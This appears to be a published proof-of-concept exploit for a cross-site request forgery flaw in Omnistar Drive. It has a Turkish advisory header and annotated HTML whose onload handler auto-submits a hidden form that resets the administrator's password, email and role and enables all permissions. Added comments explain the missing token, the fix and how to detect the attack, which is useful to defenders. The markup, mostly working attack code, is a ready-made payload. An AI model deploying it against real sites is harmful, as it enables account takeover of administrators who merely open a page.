< ------------------- header data start ------------------- >
#############################################################
# Application Name : Omnistar Drive
# Vulnerable Type : XSRF
# Infection : Uzaktan otomatik olarak admin pass change edilebilir.
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.
# author : Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >
<!-- Proof-of-concept markup for the CSRF issue described in the header above.
     As written it is a page whose body onload handler submits the hidden form
     named ButterflyEffect, so merely loading the page from a browser that still
     holds an authenticated Omnistar Drive session would issue the POST below. -->
<b0dy onLoad=Submit();>
<script>function Submit[]{document.ButterflyEffect.submit();}</script>
<!-- Defender's note: the target is the user-edit action (act=edit) of the users
     interface. Nothing in this form carries a per-session anti-CSRF token and
     there is no field for the account's current password, so the server cannot
     tell this cross-site POST apart from an edit the administrator made in the
     application's own UI. The fix suggested in the header applies exactly here:
     bind the form to a session token that the server verifies on act=edit, and
     require the old password before accepting a password change. Rejecting
     (and logging) POSTs to this action whose Origin/Referer is not the
     application's own host is an additional, cheaper layer of defence. -->
<form action=http://www.site.com/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=edit#
method=post name=ButterflyEffect>
<input type=hidden name=id value=>
<input type=hidden name=username id=username value=ButterflyEffect size=20 maxlength=30 class=input >
<!-- The new password and its confirmation are supplied directly as hidden
     fields; the application apparently accepts them without any proof that
     the submitter knows the existing password. -->
<input type=hidden name=password id=password value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=confirm id=confirm value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=first_name id=first_name value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=last_name id=last_name value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=email id=email value=[email protected] size=30 maxlength=255 class=input>
<!-- The role is preset to Admin in the same request as the credential change;
     a role/privilege change is a second action that should be protected by the
     same token check (and, ideally, by a server-side rule that a request may
     not elevate its own account). -->
<select name=role id=role onChange=changeUserType(this); ><option value=Admin ></option>
<!-- All permission flags are forced on at once. From a detection standpoint a
     single edit that simultaneously changes password, email, role and every
     permission bit is a strong anomaly worth alerting on in the audit log. -->
<input type=hidden name=can_add value=checkin id=can_add_checkin>
<input type=hidden name=can_add_folders value=1 id=can_add_folders>
<input type=hidden name=must_be_reviewed value=1 id=must_be_reviewed>
<input type=hidden name=can_change_password value=1 checked id=can_change_password>
<input type=hidden name=can_mail_selected value=1 checked id=can_mail_selected>
<input type=hidden name=send_expired_email value=1 id=send_expired_email>
<!-- The image input doubles as the submit control; the external image URL is
     only cosmetic. The form element is never closed in the original listing. -->
<input type=image src= a target=_blank href=http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif>http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif>
< -- bug code end of -- >